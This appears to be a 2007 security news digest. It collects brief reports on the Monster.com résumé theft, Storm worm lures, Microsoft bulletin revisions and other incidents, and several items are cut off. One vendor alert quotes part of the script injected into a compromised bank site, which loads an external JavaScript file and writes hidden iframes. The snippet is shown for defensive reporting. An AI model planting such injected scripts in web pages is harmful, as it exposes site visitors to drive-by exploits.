DP's Security Bits

Monster Worldwide, the owner of employment search site Monster.com, began notifying this week the estimated 1.3 million users affected by a breach that leaked résumé information and pledged to beef up network monitoring and defenses to prevent such a leak from happening again.

As reported by SecurityFocus, a malicious Trojan-horse program dubbed Infostealer.Monstres accessed résumé data using stolen, but valid, employer credentials and copied the information to a remote server. The information included names, physical and e-mail addresses, and phone numbers. At least one reader of SecurityFocus has claimed to have been notified by Monster that their information had been stolen.

http://www.securityfocus.com/brief/580 

Issued: August 29, 2007

Summary

The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

  * MS07-047 - Important
  * MS07-046 - Critical
  * MS07-045 - Critical
  * MS07-044 - Critical

Bulletin Information:

* MS07-047 - Important

  - http://www.microsoft.com/technet/security/bulletin/ms07-047.mspx
  - Reason for Revision: V1.1 (August 29, 2007): Bulletin revised to
    correct Registry Key Verification for Windows Media Player
    7.1, 9, 10, and 11 on supported editions of Windows 2000
    Service Pack 4, Windows Server 2003 Service Pack 1, Windows
    Server 2003 Service Pack 2, Windows XP Service Pack 2 and x64
Editions. 
  - Originally posted: August 14, 2007
  - Updated: August 29, 2007
  - Bulletin Severity Rating: Important
  - Version: 1.1
   
* MS07-046 - Critical

  - http://www.microsoft.com/technet/security/bulletin/ms07-046.mspx
  - Reason for Revision: Bulletin Updated: Additional information has
    been added to include workarounds for this vulnerability.  
  - Originally posted: August 14, 2007
  - Updated: August 29, 2007
  - Bulletin Severity Rating: Critical
  - Version: 1.1
   
* MS07-045 - Critical

  - http://www.microsoft.com/technet/security/bulletin/ms07-045.mspx
  - Reason for Revision: Revised to document the functionality change
    of increasing the limit on cookies from 20 to 50. 
  - Originally posted: August 14, 2007
  - Updated: August 29, 2007
  - Bulletin Severity Rating: Critical
  - Version: 1.2
   
* MS07-044 - Critical

  - http://www.microsoft.com/technet/security/bulletin/ms07-044.mspx
  - Reason for Revision: Bulletin updated to change download link
    display text for Office components in Affected Software table 
  - Originally posted: August 14, 2007
  - Updated: August 29, 2007
  - Bulletin Severit

Websense® Security Labs(TM) has received reports of a new variant of an email attack that was originally launched early this year. The spoofed email purports to be from the Better Business Bureau (BBB). The message claims that a complaint has been filed against the recipient's company.

Previously, the email attack contained an attachment that the victim would need to open in order to become infected. The new variant is slightly different.

The new message uses a tactic employed by other, more-successful email attacks, such as the recent Storm worm. Instead of including an attachment in the email, the body of the email contains a link to an external Web site from which the payload is downloaded if the link is accessed. This method allows the attack to bypass many attachment filters at the email gateway.

Link to our previous BBB alert:
http://www.websense.com/securitylabs/alerts/alert.php?AlertID=777

Details ... 

Symantec Corp. launched new editions of its consumer Norton AntiVirus and Norton Internet Security (NIS) software today, adding new browser defenses for some users in both packages and wrapping features from its new identity initiative into the suite.

The 2008 versions boast several new features and enhancements, including something that Symantec is calling Browser Defender, which is behavioral-based technology that inspects all ActiveX, JavaScript and VBScript code executing within Microsoft Corp.'s Internet Explorer browser.

Continues at computerworld.com 

Software with fewer bugs is not necessarily less risky to use, according to a recent study conducted by the Honeynet Project.

The study analyzed client-side attacks in the wild using a large list of 300,000 URLs gathered during two weeks in May 2007 by automated virtual machines. Older versions of the three major browsers for Windows -- Microsoft's Internet Explorer 6 SP2, Mozilla's Firefox 1.5.0, and Opera's Opera 8.0.0 -- were each used to browse the same subset, about 10 percent, of the sites. While researchers have disclosed about twice as many vulnerabilities for Firefox 1.5.0 as for Internet Explorer 6 SP2, the Honeynet Project found no attacks against the browser. Microsoft's Web software, however, was compromised nearly 200 times.

http://www.securityfocus.com/brief/578 

The Storm Trojan / Bot continues to spread and is now using a YouTube video to lure users. The latest version has a variety of subjects and email bodies but now uses the filename video.exe.

Email subject example: Sheesh man what are you thinkin.

Upon connecting to the URL, which is referenced as a YouTube link but is actually a Storm IP, the same exploit code used in past attacks attempts to run. As in the past if users are not vulnerable they will get a page displayed that  requests they run the code manually such as in the screenshot below:

 Websense Alert

A Web site owner has blocked Firefox users from accessing his site in protest of a popular Firefox browser extension that blocks text and display ads.

Firefox users who go to http://jacklewis.net/weblog/ are redirected to Why Firefox is Blocked, which says the Adblock Plus extension undercuts Web sites dependent on advertising revenue.

"Accessing the content while blocking the ads therefore would be no less than stealing," wrote Danny Carlton, a Web site designer and author, who runs both sites. JackLewis.net is his personal blog site; "Jack Lewis" is a pseudonym adopted, according to a Google-cached version of Carlton's site, as a defense against "crazy people."

Full Story at computerworld.com 

Attackers are probing for Windows servers running Trend Micro Inc.'s ServerProtect antivirus software, researchers warned.

Early today, Symantec Corp.'s DeepSight threat network monitored a major spike in traffic over TCP port 5168, which is related to the remote procedure call service in ServerProtect. "This may indicate an ongoing mass-scanning and exploitation attempt trying to exploit vulnerable systems for the newly disclosed vulnerabilities," said Symantec analyst Pukhraj Singh in an alert issued to corporate customers.

Continues at computerworld.com 

Monster Worldwide, the owner of employment search site Monster.com, warned job seekers late Wednesday that the company had discovered and shut down a rogue database that contained personal information culled from résumés posted on the site.

As reported by SecurityFocus, online fraudsters have used the database to craft personalized e-mails that purport to be a work-at-home job, but in reality are part of a scheme to steal funds from a bank account. The information found on the server included names, addresses, phone numbers and e-mail addresses, the company said.

http://www.securityfocus.com/brief/574 

Issued: August 22, 2007

Summary

The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

  * MS07-045 - Critical
  * MS07-050 - Critical

Bulletin Information:

* MS07-045 - Critical

  - http://www.microsoft.com/technet/security/bulletin/ms07-045.mspx
  - Reason for Revision: Revised to correct Registry Key Verification
    for Internet Explorer 7 for all supported 32-bit editions,
    64-bit editions, and Itanium-based editions of Windows Server 2003. 
  - Originally posted: August 14, 2007
  - Updated: August 22, 2007
  - Bulletin Severity Rating: Critical
  - Version: 1.1
       
* MS07-050 - Critical

  - http://www.microsoft.com/technet/security/bulletin/ms07-050.mspx
  - Reason for Revision: Revised to correct Registry Key Verification
    for Internet Explorer 7 for all supported 32-bit editions,
    64-bit editions, and Itanium-based editions of Windows Server 2003 
  - Originally posted: August 14, 2007
  - Updated: August 22, 2007
  - Bulletin Severity Rating: Critical
  - Version: 1.2

The group responsible for propagating the malicious program commonly known as the Storm Worm changed tactics this week, using e-mail messages masquerading as verification announcements from online Web sites and clubs to lure victims.

http://www.securityfocus.com/brief/573 

Employers are increasingly blocking access to Facebook because they're concerned about the time wasted and the information leaked when workers use social networks on company time.

About half of all companies block employee access to Facebook, putting policies and access controls in place to keep workers working and not connecting with their Facebook friends, according to security company Sophos. In a poll of 600 workers, 43% said their company was blocking access to Facebook, while an another 7% reported that usage of the Web site was restricted and only those with a specific business requirement were allowed to access it.

Full Story at informationweek.com 

The 46,000 people reportedly infected by ads on job sites may be only a fraction of the victims of an ambitious, multistage attack that has stolen data belonging to several hundred thousand people who posted resumes on Monster.com, a researcher said this weekend.

According to Symantec security analyst Amado Hidalgo, a new Trojan horse called Infostealer.Monstres by Symantec has stolen more than 1.6 million records belonging to several hundred thousand people from Monster Worldwide's job search service. That data is then used to target the Monster.com users with credible phishing mail that plants more malware on their machines.

Full Story at infoworld.com

A security researcher at SecureWorks Inc. has uncovered a cache of financial and personal data that was stolen from about 46,000 individuals by a variant of Prg, a Trojan program gaining notoriety for its quick-change behaviors.

The stolen data includes bank and credit card account information and Social Security numbers as well as usernames and passwords for online accounts. Many of the victims were infected and reinfected as they visited several leading online job search sites, including the popular Monster.com.

Continues at computerworld.com 

Websense® Security LabsT has discovered that the official site for Indian Syndicate Bank (www.syndicatebank.in), was compromised with a malicious script that attempts to exploit multiple vulnerabilities. When customers visit the web site, a malicious JavaScript file (e.js) is executed and creates two additional iframes in the page.

<script src=http://< URL REMOVED >/e.js></script>

Snippet of js code:

document.writeln("\/\/xxxx mca By Mr.0wen\/\/");
document.writeln("document.write(unescape(\"%3CIFraMe < URL REMOVED >IFraMe < URL REMOVED >wIdth%3D%220%22%20heIght%3D

Sourcefire, a maker of intrusion detection products, announced on Friday that the company had acquired the intellectual property and copyrights to the open-source antivirus project, ClamAV, from five key developers.

Under the terms of the agreement with ClamAV founder Tomasz Kojm and four other members of the project, Sourcefire acquired the rights and trademarks to the project, the five developers' copyrights and all Web content. Sourcefire, which already owns rights to the open-source Snort intrusion detection system created by company founder Martin Roesch, said it will maintain ClamAV much in the same way as it has done with Snort.

http://www.securityfocus.com/brief/571 

The open-source Ubuntu project shut down on Saturday five of eight community-run servers that the group sponsors, after attacks were detected emanating from the computers.

The Ubuntu project, which manages the popular Linux distribution, received reports of the attacks on Monday, August 6, and proceeded to take the servers offline. The servers were running an older version of the Ubuntu Linux operating system, making several software packages vulnerable to known flaws.

http://www.securityfocus.com/brief/570 

Issued: August 15, 2007

Summary

The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

  * MS07-050 - Critical
  * MS07-042 - Critical

Bulletin Information:

* MS07-050 - Critical

  - http://www.microsoft.com/technet/security/bulletin/ms07-050.mspx
  - Reason for Revision: Correct file information for Microsoft
    Internet Explorer 7 for Windows 2003  
  - Originally posted: August 14, 2007
  - Updated: August 15, 2007
  - Bulletin Severity Rating: Critical
  - Version: 1.1
    
* MS07-042 - Critical

  - http://www.microsoft.com/technet/security/bulletin/ms07-042.mspx
  - Reason for Revision: Bulletin Updated: corrected file manifest
    information for Microsoft XML Core Services 4.0.  
  - Originally posted: August 14, 2007
  - Updated: August 15, 2007
  - Bulletin Severity Rating: Critical
  - Version: 1.1

Researchers at McAfee are reporting that they've reproduced a reported zero-day vulnerability in the Yahoo Messenger Webcam.

Karthik Raman, a researcher with McAfee, first reported on a Tuesday blog entry that Chinese researchers were claiming to have found a zero-day bug in Yahoo Messenger. On Wednesday, Raman's fellow McAfee researcher Wei Wang, noted in a blog entry that they have been able to reproduce the vulnerability on Messenger V8.1.0.413.

Continues at informationweek.com 

Storm, the Trojan horse that collects PCs into hacker-controlled botnets, roared back into life last month in several waves, security researchers said Monday, and has blown by 2005's Sober to become the most prolific e-mail-borne malware ever.

"This is the biggest since Sober in mid-to-late 2005," said Sam Masiello, director of threat research at MX Logic Inc., referring to a long-lasting worm whose variants struck repeatedly in the second half of 2005, often in extremely high numbers. In November 2006, for instance, e-mail filtering companies reported malware-laden e-mail counts spiking 1,500% in a week, and said they were intercepting four times the usual number of infected messages.

Continues at computerworld.com